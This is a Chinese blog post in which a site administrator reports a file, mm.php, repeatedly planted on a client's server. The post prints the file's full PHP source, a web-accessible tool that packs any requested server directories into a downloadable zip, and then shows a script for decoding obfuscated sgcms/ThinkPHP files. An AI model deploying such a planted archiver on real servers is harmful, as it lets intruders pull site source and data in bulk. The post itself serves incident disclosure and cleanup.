今天一个客户的服务器频繁被写入:
mm.php
内容为:
[url=http://nbst.org]<div>
';
set_time_limit(0);
class PHPzip
{
var $file_count = 0 ;
var $datastr_len = 0;
var $dirstr_len = 0;
var $filedata = '';
var $gzfilename;
var $fp;
var $dirstr='';
var $filefilters = array();
function SetFileFilter($filetype)
{
$this->filefilters = explode('|',$filetype);
}
function unix2DosTime($unixtime = 0)
{
$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);
if ($timearray['year'] <1980)
{
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);
}
function startfile($path = 'dodo.zip')
{
$this->gzfilename=$path;
$mypathdir=array();
do
{
$mypathdir[] = $path = dirname($path);
}while($path != '.');
@end($mypathdir);
do
{
$path = @current($mypathdir);
@mkdir($path);
}while(@prev($mypathdir));
if($this->fp=@fopen($this->gzfilename,'w'))
{
return true;
}
return false;
}
function addfile($data,$name)
{
$name = str_replace('\\','/',$name);
if(strrchr($name,'/')=='/')
return $this->adddir($name);
if(!empty($this->filefilters))
{
if (!in_array(end(explode('.',$name)),$this->filefilters))
{
return;
}
}
$dtime = dechex($this->unix2DosTime());
$hexdtime = '\x'.$dtime[6] .$dtime[7] .'\x'.$dtime[4] .$dtime[5] .'\x'.$dtime[2] .$dtime[3] .'\x'.$dtime[0] .$dtime[1];
eval('$hexdtime = "'.$hexdtime .'";');
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata,0,strlen($zdata) -4),2);
$datastr = "\x50\x4b\x03\x04";
$datastr .= "\x14\x00";
$datastr .= "\x00\x00";
$datastr .= "\x08\x00";
$datastr .= $hexdtime;
$datastr .= pack('V',$crc);
$datastr .= pack('V',$c_len);
$datastr .= pack('V',$unc_len);
$datastr .= pack('v',strlen($name));
$datastr .= pack('v',0);
$datastr .= $name;
$datastr .= $zdata;
$datastr .= pack('V',$crc);
$datastr .= pack('V',$c_len);
$datastr .= pack('V',$unc_len);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02";
$dirstr .= "\x00\x00";
$dirstr .= "\x14\x00";
$dirstr .= "\x00\x00";
$dirstr .= "\x08\x00";
$dirstr .= $hexdtime;
$dirstr .= pack('V',$crc);
$dirstr .= pack('V',$c_len);
$dirstr .= pack('V',$unc_len);
$dirstr .= pack('v',strlen($name) );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',0 );
$dirstr .= pack('V',32 );
$dirstr .= pack('V',$this->datastr_len );
$dirstr .= $name;
$this->dirstr .= $dirstr;
$this ->file_count ++;
$this ->dirstr_len += strlen($dirstr);
$this ->datastr_len += $my_datastr_len;
}
function adddir($name)
{
$name = str_replace("\\",'/',$name);
$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$datastr .= pack('V',0).pack('V',0).pack('V',0).pack('v',strlen($name) );
$datastr .= pack('v',0 ).$name.pack('V',0).pack('V',0).pack('V',0);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$dirstr .= pack('V',0).pack('V',0).pack('V',0).pack('v',strlen($name) );
$dirstr .= pack('v',0 ).pack('v',0 ).pack('v',0 ).pack('v',0 );
$dirstr .= pack('V',16 ).pack('V',$this->datastr_len).$name;
$this->dirstr .= $dirstr;
$this ->file_count ++;
$this ->dirstr_len += strlen($dirstr);
$this ->datastr_len += $my_datastr_len;
}
function createfile()
{
$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00".
pack('v',$this ->file_count) .
pack('v',$this ->file_count) .
pack('V',$this ->dirstr_len) .
pack('V',$this ->datastr_len) .
"\x00\x00";
fwrite($this->fp,$this->dirstr.$endstr);
fclose($this->fp);
}
}
if(!trim($_REQUEST[zipname]))
$_REQUEST[zipname] = 'dodozip.zip';
else
$_REQUEST[zipname] = trim($_REQUEST[zipname]);
if(!strrchr(strtolower($_REQUEST[zipname]),'.')=='.zip')
$_REQUEST[zipname] .= '.zip';
$_REQUEST[todir] = str_replace('\\','/',trim($_REQUEST[todir]));
if(!strrchr(strtolower($_REQUEST[todir]),'/')=='/')
$_REQUEST[todir] .= '/';
if($_REQUEST[todir]=='/')
$_REQUEST[todir] = './';
function listfiles($dir='.')
{
global $dodozip;
$sub_file_num = 0;
if(is_file("$dir"))
{
if(realpath($dodozip ->gzfilename)!=realpath("$dir"))
{
$dodozip ->addfile(implode('',file("$dir")),"$dir");
return 1;
}
return 0;
}
$handle=opendir("$dir");
while ($file = readdir($handle))
{
if($file=='.'||$file=='..')
continue;
if(is_dir("$dir/$file"))
{
$sub_file_num += listfiles("$dir/$file");
}
else
{
if(realpath($dodozip ->gzfilename)!=realpath("$dir/$file"))
{
$dodozip ->addfile(implode('',file("$dir/$file")),"$dir/$file");
$sub_file_num ++;
}
}
}
closedir($handle);
if(!$sub_file_num)
$dodozip ->addfile('',"$dir/");
return $sub_file_num;
}
function num_bitunit($num)
{
$bitunit=array(' B',' KB',' MB',' GB');
for($key=0;$key<count($bitunit);$key++)
{
if($num>=pow(2,10*$key)-1)
{
$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
}
}
return $num_bitunit_str;
}
if(is_array($_REQUEST[dfile]))
{
$dodozip = new PHPzip;
if($_REQUEST['filetype'] != NULL)
$dodozip ->SetFileFilter($_REQUEST['filetype']);
if($dodozip ->startfile("$_REQUEST[todir]$_REQUEST[zipname]"))
{
echo 'Working,Please wait...<br><br>';
$filenum = 0;
foreach($_REQUEST[dfile] as $file)
{
if(is_file($file))
{
if(!empty($dodozip ->filefilters))
if (!in_array(end(explode('.',$file)),$dodozip ->filefilters))
continue;
echo "<font face=\"wingdings\" size=\"5\">2</font> $file<br>";
}
else
{
echo "<font face=\"wingdings\" size=\"5\">0</font> $file<br>";
}
$filenum += listfiles($file);
}
$dodozip ->createfile();
echo "<br>success,For $filenum files.Url:<a href='$_REQUEST[todir]$_REQUEST[zipname]' _fcksavedurl='$_REQUEST[todir]$_REQUEST[zipname]'>$_REQUEST[todir]$_REQUEST[zipname] (".num_bitunit(filesize("$_REQUEST[todir]$_REQUEST[zipname]")).')</a>';
}
else
{
echo "$_REQUEST[todir]$_REQUEST[zipname] Error,Unable to write file.<br>";
}
}
;echo '
</form>
</body>
</html>
';?>
这是一个用来打包成zip的php代码,这些鸟人为了黑别人的网站什么办法都用,真恶心~~
下如是一个高人写的ThinkPHP框架(sgcms)解密程序:
<?php
// This file is protected by sgcms & provided under license.
Copyright(C) 2007-2010 www.sgcms.cn, All rights reserved.
$OOO0O0O00=__FILE__;
$OOO000000=urldecode('th6sbehqla4co_sadfpnr');
$OO00O0000=21496;
$OOO0000O0=$OOO000000{4}.
$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$O0O0000O0='OOO0000O0';
eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwM...
很明显,是使用了某种PHP代码混淆工具混淆了下,Google网上搜了下,问题解决,给遇到同样问题的朋友一个方便。
解密php文件:
<?php
$filename="GlobalAction.class.php";//要解密的文件
$lines = file($filename);//0,1,2行
//第一次base64解密
$content="";
if(preg_match("/O0O0000O0\('.*'\)/",$lines[1],$y))
{
$content=str_replace("O0O0000O0('","",$y[0]);
$content=str_replace("')","",$content);
$content=base64_decode($content);
}
//第一次base64解密后的内容中查找密钥
$decode_key="";
if(preg_match("/\),'.*',/",$content,$k))
{
$decode_key=str_replace("),'","",$k[0]);
$decode_key=str_replace("',","",$decode_key);
}
//查找要截取字符串长度
$str_length="";
if(preg_match("/,\d*\),/",$content,$k))
{
$str_length=str_replace("),","",$k[0]);
$str_length=str_replace(",","",$str_length);
}
//截取文件加密后的密文
$Secret=substr($lines[2],$str_length);
//echo $Secret;
//直接还原密文输出
echo "<?php\n".base64_decode(strtr($Secret,$decode_key,
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')).
"?>";
?>
机械节能产品生产企业官网模板...
大气智能家居家具装修装饰类企业通用网站模板...
礼品公司网站模板
宽屏简约大气婚纱摄影影楼模板...
蓝白WAP手机综合医院类整站源码(独立后台)...
